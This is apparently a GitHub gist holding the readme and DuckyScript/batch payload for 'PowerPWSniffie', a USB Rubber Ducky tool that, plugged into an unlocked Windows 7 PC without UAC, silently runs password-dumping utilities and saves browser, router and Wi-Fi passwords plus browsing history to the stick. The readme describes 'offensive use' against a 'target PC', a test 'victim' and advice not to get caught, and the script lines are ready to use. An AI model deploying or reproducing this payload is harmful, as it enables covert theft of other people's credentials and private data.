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Last active December 19, 2015 11:28
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Save powerslaver85/5947523 to your computer and use it in GitHub Desktop.
PowerPWSniffie for Rubber Ducky (C_Duck V2.1 / Duck Encoder 2.6) A Rubber Ducky Payload including freeware apps to sniff out passwords from Windows 7 PCs that are logged in and w/o UAC. NOTE: You need the executable files from the Archive i linked at the bottom. You can also find all this stuff on my website
................MMMMMMM.................(_____ \..........................| |......................
................MMMMMMM................. _____) )__.._._._._____..____.___| |._____._..._._____....
......MMMMM.....MMMMMMM......MMMM.......| ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |...
....MMMMMMMM....MMMMMMM....MMMMMMMM.....| |...| |_| | | | | ____| |..|___ | |/ ___ |\ V /| ____|...
.MMMMMMMMMM.....MMMMMMM.....MMMMMMMMMM...Cyberarms and Security Tools / Visit
MMMMMMMMM.......MMMMMMM.......MMMMMMMMM.Document: Readme/NFO-File ...
MMMMMMMM........MMMMMMM........MMMMMMMM.Title: PowerPWSniffie ...
MMMMMMM..........MMMMM..........MMMMMMM.Date: 03. July 2013 ...
MMMMMMM........................MMMMMMMM.Author: Powerslave himself ...
MMMMMMMM.......................MMMMMMMM.Language: Ducky Script & Bash ...
MMMMMMMM.......................MMMMMMMM.Target OS: Windows 7 x64 w/o UAC ...
MMMMMMMMM.....................MMMMMMMMM.Tool type: Password & Web History HiJacker ...
.MMMMMMMMM...................MMMMMMMMM..Version: 0.9.2 Beta / Untested ...
..MMMMMMMMMM...............MMMMMMMMMM...Contact: ...
....MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.....Note: I won't take any responsibility for illegal stuff ...
.....MMMMMMMMMMMMMMMMMMMMMMMMMMMMM......someone except me could do! I wrote it for learning and ...
.......MMMMMMMMMMMMMMMMMMMMMMMMM........experimental reasons. Use but don't abuse ...
. .
. PowerPWSniffie general informations .
. .
. PowerPWSniffie is a Payload for the HAK5/USB_Rubber_Ducky, if you don't own a Rubber Ducky you .
. can order one at .
. However, this toolkit includes a set of freeware password sniffers and a batch file (launch.bat).
. which will run on a regular USB Stick aswell, you just need to name it DUCKY (Important!) and .
. you have to run the "launch.bat" file by clicking it. .
. .
. But i strongly recommend using the Ducky, everything runs automatically, no need to touch the .
. mouse of the target PC and its a really nifty toy for other stuff too, just get one. Trust me .
. .
. 1. Setting up the duck .
. .
. To run this Payload on the Rubber Ducky, you need to make sure that you run the right firmware. .
. Since we use the Ducky as Mule for the Password Sniffer .exe files and the Batch file, maybe .
. there is a better way in the future since its a pretty slow device if it comes to file traffic. .
. However, i decided to use the C_Duck Firmware (Version 2.1) you can download the firmware from .
. , you will find other apps we will need .
. aswell there, and a guide on how to flash the Duck with other firmwares like C_Duck. I won't .
. explain it here, since the guide on the Wiki site is very nice and there is no need to write .
. another one. I know i am lazy, sorry ;-) .
. After that copy the folders exec and logs in the Root directory of the microSD card. next comes .
. the payload. .
. .
. 2. Encoding the Payload .
. .
. Follow the Guide on: , use the encoder.
. on the "PWsniffer.txt" file inside the "payload" folder. The Powershell prompt sould look some- .
. thing like that: PS C:\Ducky Encoder\> java -jar encoder.jar -i PWsniffer.txt -o inject.bin ** .
. ** depending on your keyboard layout you need to add -l resources\ (us = USA) .
. Now make sure the fresh encoded inject.bin is copied in the root directory of the microSD card. .
. Instead of encoding it yourself you can use the inject.bin file i encoded, however i don't .
. recommend using inject.bin files from others, you never know what is really inside. .
. But of course i am one of the nice guys and i won't harm you, or do i? .
. In version 0.9.3 Lite there are two payloads the one for offensiv use is filename.payload.txt .
. the other "filename.develop.txt" is for testing stuff, the only difference is the starting delay.
. .
. 3. Let the duck do the job! .
. .
. Well if everything worked fine until now, and the encoded inject.bin is on a microSD placed .
. a duck butt, you are ready for a first test run. Depending on the start DELAY the duck will .
. run after a second (This is default setting for testing on your own box). However, if you .
. use the rubber ducky on a "virgin" machine, which had never contact with a ducky, there will .
. be a initial deadline, since the driver has to be installed on windows first, the good thing: .
. this happens automatically, you don't even have to click (This is a w/o UAC Payload). .
. The bad thing: this may take some time, depending on the power of the target PC, i am working .
. on a fast Box with 8 Core I7 Ivy Bridge CPU, and 16 Gigs of RAM, running with a semi-fast HDD. .
. This is my working PC, the initial driver setup still needs like 10 sec, so 2x a DELAY 10000 .
. may not be the worst idea, but don't forget, 20 seconds can be an eternity depending on the Job .
. .
. 4. The end .
. .
. Since, this payload is still in development, nothing is really done, the readme isn't done the .
. speed is still slow, but its still working, and there is potential. .
. .
. 5. The future .
. .
. First, the script will be tweaked and tested on other machines, top priority has the speed. .
. another task is hiding the CMD window, and the batch file still needs some modifications. .
. Well i don't know alot about copyright, but everything inside this archive is freeware. .
. My payload is open-source and free aswell, use it as you wish, enhance it, whatever. .
. BUT: I won't take any responsibility for anything that may happen with this tool, i actually .
. use it to gather my own accounts and store them somewhere safe, pretty usefull and nobody .
. dies. Use but don't abuse, or at least, don't get caught... .
. .
. PS: i know my english sucks very hard, if you want to correct it and send me a clean version .
. back, i won't stop you. POWERSLAVE .
start %DUCKYdrive%\exec\WebBrowserPassView.exe /stext %DUCKYdrive%\logs\WebBrowserPassLog.txt
start %DUCKYdrive%\exec\RouterPassView.exe /stext %DUCKYdrive%\logs\RouterPassLog.txt
start %DUCKYdrive%\exec\BrowsingHistoryView.exe /stext %DUCKYdrive%\logs\BrowsingHistoryLog.txt
start %DUCKYdrive%\exec\WirelessKeyView.exe /stext %DUCKYdrive%\logs\WirelessKeyLog.txt
REM Author: Powerslave* ** / Language/Type: DuckyScript/ASCII / Version: 0.9.3 Beta Lite / RC1
REM *Original Script and app collection from Mr. Grey @ Hak5 Forums.
REM Title: PowerPWSniffie for Rubber Ducky (Composite Ducky Firmware)
REM Description: check the REAME.nfo, its made with love, i swear
REM a ______ _
REM (_____ \ | |
REM _____) )__ _ _ _ _____ ____ ___| | _____ _ _ _____
REM | ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |
REM | | | |_| | | | | ____| | |___ | |/ ___ |\ V /| ____|
REM |_| \___/ \___/|_____)_| (___/ \_)_____| \_/ |_____).ch
REM Product
REM Target: Windows 7 x64 / no UAC / Admin Login
REM Starting ducky script -- Set the start DELAY to 1000 if no Driver Install is needed.
DELAY 8000
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
STRING %DUCKYdrive%\exec\launch.bat
REM Notizen an mich: (You don't have to understand that ;-)
REM Muss noch getestet werden an VM und später an neutraler maschiene. Mal sehen wer sich als opfer anbietet.
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